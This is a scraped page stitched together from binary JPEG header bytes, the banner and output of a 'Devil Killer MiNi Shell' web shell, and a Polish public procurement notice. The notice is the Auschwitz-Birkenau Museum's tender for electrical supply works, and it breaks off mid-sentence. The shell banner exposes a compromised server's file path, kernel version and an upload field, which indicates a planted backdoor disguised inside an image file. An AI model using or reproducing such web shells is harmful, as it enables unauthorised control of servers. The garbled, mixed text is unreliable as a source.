JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240202/0008982101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Zasilanie budynku Ziemniaczarki I przy ul. Kombatantów w Brzezince oraz obiektów na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu zlokalizowanych <br/>w Brzezince” (...)&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276015</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Więźniów Oświęcimia 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@auschwitz.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.auschwitz.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zasilanie budynku Ziemniaczarki I przy ul. Kombatantów w Brzezince oraz obiektów na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu zlokalizowanych <br/>w Brzezince” (...)&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5ace2a2e-c1eb-11ee-bbfa-e29e26ebc6e1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00089821</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5ace2a2e-c1eb-11ee-bbfa-e29e26ebc6e1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>platformy eZamawiający – https://ezamowienia.gov.pl/pl/.<br/>2. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawców i Zamawiającego za pośrednictwem<br/>platformy e-zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>przetargi@auschwitz.org, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu platformy eZamowienia -<br/>https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe wymagania techniczne i<br/>organizacyjne zostały wskazane w Dziale VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest zaprojektowanie i wybudowanie zasilania budynku Ziemniaczarki I przy ul.<br/>Kombatantów w Brzezince oraz obiektów na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu<br/>zlokalizowanych w Brzezince na warunkach określonych niniejszą Umową oraz dokumentacją postępowania o udzielenie<br/>niniejszego zamówienia (dalej Zadanie) składające się z: <br/>2.1. FAZY I PROJEKTOWEJ – obejmującej opracowanie Dokumentacji Projektowej oraz pełnienie nadzoru autorskiego,<br/>podczas realizacji zadania objętego przedmiotową dokumentacją – zgodnie z art. 20 ust. 1 pkt 4 ustawy Prawo budowlane,<br/>niezależnie od podmiotu realizującego roboty budowlane przedmiotowego zadania lub część tego zadania.<br/>2.2. FAZY II WYKONAWCZEJ – obejmującej wykonanie robót budowalnych w oparciu o Dokumentację Projektową<br/>opracowaną w FAZIE I. <br/>FAZA II składa się z zadania podstawowego oraz trzech opcji, a także wykonywania przeglądów<br/>gwarancyjnych. <br/>Szczegółowy zakres przedmiotu umowy dla FAZY I i FAZY II został ujęty w Programie Funkcjonalno-Użytkowym<br/>stanowiącym załącznik nr 8 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45311200-2 - Roboty w zakresie instalacji elektrycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">71321000-4 - Usługi inżynierii projektowej dla mechanicznych i elektrycznych instalacji budowlanych</p> <p class="mb-0">71351914-3 - Usługi archeologiczne</p> <p class="mb-0">45232200-4 - Roboty pomocnicze w zakresie linii energetycznych</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje trzy zakresy objęte opcją. Maksymalna wartość opcji: 1435294,54 netto, tj. 1765412,28 zł brutto.<br/>Zakres opcji został określony w ramach przedmiotu zamówienia i w treści PFU stanowiącego załącznik nr 8 do SWZ.<br/>6. Warunki i zasady skorzystania z prawa opcji: <br/>6.1. Zamawiający zastrzega, iż w przypadku zapewnienia środków finansowych w okresie obowiązywania umowy,<br/>przewiduje możliwość skorzystania z prawa zlecenia wykonania robót i badań archeologicznych w ramach prawa opcji bądź<br/>ich poszczególnych części w ramach prawa opcji, na warunkach określonych w umowie.<br/>6.2. Szczegółowy zakres robót i badań archeologicznych przewidzianych do realizacji w ramach prawa opcji określony<br/>został w PFU. <br/>6.3. Warunkiem skorzystania z zamówienia w ramach prawa opcji jest złożenie pisemnego oświadczenia przez<br/>Zamawiającego w terminie nie później niż 30 dni przed terminem wskazanym w Harmonogramie rzeczowo – finansowym<br/>zaakceptowanym przez Zamawiającego dla zakończenia Zadania Podstawowego (drugi odbiór częściowy Zadania<br/>Podstawowego), o skorzystaniu z tego prawa, w którym ustali ostateczny zakres rzeczowy przedmiotu umowy. Wzór<br/>oświadczenia woli Zamawiającego na wykonanie danego zakresu robót na podstawie prawa opcji stanowi załącznik nr 6 do<br/>wzoru Umowy. <br/>6.4. Zamawiający zastrzega sobie możliwość realizacji zamówienia w ramach prawa opcji, w niepełnym zakresie i<br/>powierzenia tylko jej części (np. tylko PRAWO OPCJI 1) w zależności od potrzeb i posiadanych środków finansowych przez<br/>Zamawiającego. <br/>6.5. W przypadku nieskorzystania przez Zamawiającego z prawa opcji w całości, Wykonawcy przysługiwać będzie<br/>wynagrodzenie jedynie za zakres zlecony przez Zamawiającego w składanym przez niego oświadczeniu o skorzystaniu z<br/>prawa opcji. <br/>6.6. W zakresie realizacji zamówienia objętego prawem opcji zapisy SWZ stosuje się odpowiednio. <br/>6.7. Wykonawca niezależnie od tego czy Zamawiający powierzy do wykonania Wykonawcy roboty w ramach prawa opcji,<br/>jest zobowiązany do wykonania kosztorysu inwestorskiego na podstawie Dokumentacji Projektowej wykonanej w FAZIE I<br/>obejmujący te roboty.<br/>6.8. Wykonawca jest zobowiązany do pełnienia nadzoru autorskiego w przypadku, gdy realizacja którejkolwiek opcji (lub<br/>zadania podstawowego) zostanie powierzona innemu podmiotowi. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający, w<br/>zależności od potrzeb i środków finansowych, przewiduje udzielenie Wykonawcy, który realizuje zamówienie podstawowe, w okresie<br/>do 3 lat od dnia jego udzielenia, zamówienia polegającego na powtórzeniu podobnych robót budowlanych i usług obejmujących<br/>badania archeologiczne, zgodnie z art. 214 ust. 1 pkt 7 Ustawy PZP, o wartości do 40% wartości zamówienia, w zakresie realizacji<br/>badań archeologicznych lub robót budowlanych, dokumentacji powykonawczej w zakresie po wykonania kanalizacji kablowej i linii<br/>nN.<br/>22. Przewidywane zamówienia podobne będą udzielane na zasadach i warunkach określonych w umowie o zamówienie<br/>podstawowe, wg następujących zasad: <br/>1.1. Wynagrodzenie wykonawcy za realizację zamówienia podobnego zostanie ustalone w nw. sposób:<br/>1.1.1. dla robót budowlanych:<br/>1.1.1.1. ceny jednostkowe robót zostaną przyjęte z kosztorysów inwestorskich opracowanych przez Wykonawcę po wykonaniu<br/>FAZY I opracowanych metodą kalkulacji szczegółowej i zawierającego koszty wykonania wszystkich zakresów przedmiotu przyszłej<br/>umowy; <br/>1.1.1.2. ceny czynników produkcji zostaną przyjęte z zeszytów SEKOCENBUD (jako średnie) za okres ich wbudowania. Podstawą<br/>do określenia nakładów rzeczowych będą KNR-y. W przypadku braku odpowiednich pozycji + KNNR-y, a następnie wycena<br/>indywidualna Wykonawcy zatwierdzona przez Zamawiającego; <br/>1.1.2. dla prac archeologicznych – ceny zostaną przyjęte na podstawie kosztorysów inwestorskich opracowanych przez Wykonawcę<br/>po wykonaniu FAZY I, zgodne z wartościami zamieszczonymi w ofercie Wykonawcy, albo dla zakresów nie występujących w<br/>zamówieniu podstawowym - w oparciu o rynkowe ceny usług.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowy sposób oceny ofert został zawarty w dziale XV SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie osób, które będą uczestniczyć w realizacji zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.	Warunki udziału w postępowaniu określone przez Zamawiającego: W przedmiotowym postępowaniu udział mogą brać Wykonawcy, którzy spełniają warunki udziału w zakresie zdolności technicznej, zawodowej, ekonomicznej: <br/>3.1.	Zamawiający wymaga, aby Wykonawca posiadał doświadczenie w postaci zakończonych w okresie ostatnich dziesięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie: minimum 2 umów obejmujących realizację robót budowlanych zawierających w swoim zakresie wykonanie następujących rodzajów dokumentacji projektowych oraz robót budowlanych: <br/>3.1.1. co najmniej jedną dokumentację projektową mającą w swoim zakresie łącznie linię kablową SN oraz stację transformatorową co najmniej 400kVA oraz na podstawie której było uzyskane pozwolenie na budowę oraz została przeprowadzona budowa minimum jednej linii SN i minimum jednej stacji transformatorowej; <br/>3.1.2. co najmniej dwie roboty budowlane polegające na budowie łącznie linii kablowej SN oraz stacji transformatorowej co najmniej 400 kVA, [Zamawiający nie uzna warunku za spełniony, jeśli Wykonawca wykaże doświadczenie w zakresie wykonania dwóch robót jednej tylko w zakresie linii kablowej SN i jednej tylko w zakresie stacji transformatorowej]; <br/>3.1.3.	co najmniej jedną robotę budowlaną w zakresie wykonania (na podstawie Pozwolenia na budowę) instalacji elektrycznej w obiekcie lub terenie wpisanym do rejestru zabytków, wyznaczonym w decyzji o wpisie tego terenu do rejestru zabytków lub analogicznego do rejestru zabytków sposobu ochrony zabytków prowadzonego przez organy ustanowione w tym celu w innych państwach.;<br/>3.1.4.	co najmniej jedną robotę budowlaną, przy której prowadzone były badania archeologiczne;<br/>Zamawiający uzna warunek za spełniony zarówno w przypadku, w którym Wykonawca wykaże powyższe doświadczenie obejmujące dokumentację projektową oraz wykonawstwo w formule „projektuj i buduj”, jak i w przypadku przedstawienia więcej niż dwóch umów, z których każda będzie zawierała odrębnie każdy z punktów od 1 – 4 lub dojdzie do innej konfiguracji łącznie wykazującej punkty od 1-4 (np. jedna umowa obejmująca robotę budowlaną, jedną projekt budowlany i dwie w formule „projektuj i buduj”).<br/>3.2.	Zamawiający wymaga, aby Wykonawca dysponował co najmniej - kluczowy personel: <br/>3.2.1.	Wskazanym (z imienia i nazwiska) Projektantem spełniającym łącznie następujące minimalne wymagania:<br/>3.2.1.1.	posiadającym uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane, lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów uprawniające do kierowania robotami budowlanymi, <br/>3.2.1.2.	posiadającym co najmniej 2-letnie doświadczenie, po dniu uzyskania stosownych uprawnień, w projektowaniu w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (rozumiane jako suma przepracowanych miesięcy) z zastrzeżeniem, że doświadczenie to obejmuje w okresie ostatnich dwóch lat przed dniem składania ofert co najmniej 6 miesięczną aktywność zawodową we wskazanym powyżej zakresie (rozumiane jako suma przepracowanych miesięcy);<br/>3.2.1.3.	przynależy do właściwej izby samorządu zawodowego (legitymuje się aktualnym zaświadczeniem o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa);<br/>3.2.1.4.	wykonał co najmniej dwie dokumentacje projektowe mające w swoim zakresie łącznie linię kablową SN oraz stację transformatorową co najmniej 400kVA, na podstawie której były uzyskane pozwolenia na budowę [Zamawiający nie uzna warunku za spełniony, jeśli Wykonawca wykaże doświadczenie w zakresie wykonania dwóch dokumentacji projektowej jednej tylko w zakresie linii kablowej SN i jednej tylko w zakresie stacji transformatorowej],<br/>3.2.2.	Kierownikiem budowy spełniającym łącznie następujące minimalne wymagania:<br/>3.2.2.1.	posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane, lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów uprawniające do kierowania robotami budowlanymi, <br/>3.2.2.2.	posiadającym co najmniej 2-letnie doświadczenie, po dniu uzyskania stosownych uprawnień, w pełnieniu funkcji kierownika robót lub budowy lub w pełnieniu funkcji inspektora nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (rozumiane jako suma przepracowanych miesięcy) z zastrzeżeniem, że doświadczenie to obejmuje w okresie ostatnich dwóch lat przed dniem składania ofert co najmniej 6 miesięczną aktywność zawodową we wskazanym powyżej zakresie (rozumiane jako suma przepracowanych miesięcy);<br/>3.2.2.3.	posiadającym kwalifikacje i praktykę określone w art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami;<br/>3.2.2.4.	posiadającym co najmniej 18 miesięczne (licząc od momentu uzyskania uprawnień do kierowania robotami budowlanymi przy obiektach wpisanych do rejestru zabytków) doświadczenie zawodowe (rozumiane jako suma przepracowanych miesięcy) w kierowaniu robotami budowlanymi przy obiektach wpisanych do rejestru zabytków z zastrzeżeniem, że doświadczenie to obejmuje w okresie ostatnich trzech lat przed dniem składania ofert co najmniej 6 miesięczną aktywność zawodową w opisanym powyżej zakresie (rozumiane jako suma przepracowanych miesięcy) – Zamawiający uzna ten warunek za spełniony tylko w przypadku kierowania robotami, a nie w przypadku samego uczestnictwa w robotach;<br/>3.2.2.5.	posiada doświadczenie w pełnieniu funkcji kierownika budowy lub funkcji inspektora nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych podczas realizacji robót budowlanych o wartości nie mniejszej niż 1 000 000,00 zł brutto (dla jednej realizacji robót budowlanych), Zamawiający nie uzna warunku za spełniony, jeśli doświadczenie zdobyte zostało jako kierownik robót.<br/>3.2.2.6.	przynależy do właściwej izby samorządu zawodowego (legitymuje się aktualnym zaświadczeniem o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa);<br/>3.2.3.	Osobą kierującą badaniami archeologicznymi posiadającą: <br/>3.2.3.1.	uprawnienia do prowadzenia badań archeologicznych zgodnie z art. 37e ustawy o ochronie zabytków (Dz.U. z 2003 r. Nr 162, poz. 1568 z późniejszymi zmianami), tj.: badaniami archeologicznymi kieruje osoba, która ukończyła studia drugiego stopnia lub jednolite studia magisterskie, w zakresie archeologii i przez co najmniej 12 miesięcy brała udział w badaniach archeologicznych (doświadczenie zawodowe może być nabyte poza terytorium Rzeczypospolitej Polskiej).<br/>3.2.3.2.	posiada co najmniej 3-letnie doświadczenie zawodowe (rozumiane jako suma miesięcy przepracowanych jako kierownik badań archeologicznych) liczone od momentu nabycia uprawnień do prowadzenie badań archeologicznych, <br/>3.2.3.3.	posiadającym 12 miesięczne doświadczenie zawodowe (rozumiane jako suma przepracowanych miesięcy) liczone od momentu nabycia uprawnień do prowadzenie badań archeologicznych w samodzielnym prowadzeniu nadzoru lub kierowaniu nadzoru nad pracami ziemnymi związanymi z wykonywaniem robót budowlanych lub prac konserwatorskich przy obiekcie wpisanym do rejestru zabytków będącym obiektem o konstrukcji ceglanej lub obiektem związanym z funkcjonowaniem założeń obozowych z okresów wojen nowożytnych.<br/>3.3.	Zamawiający wymaga, aby Wykonawca 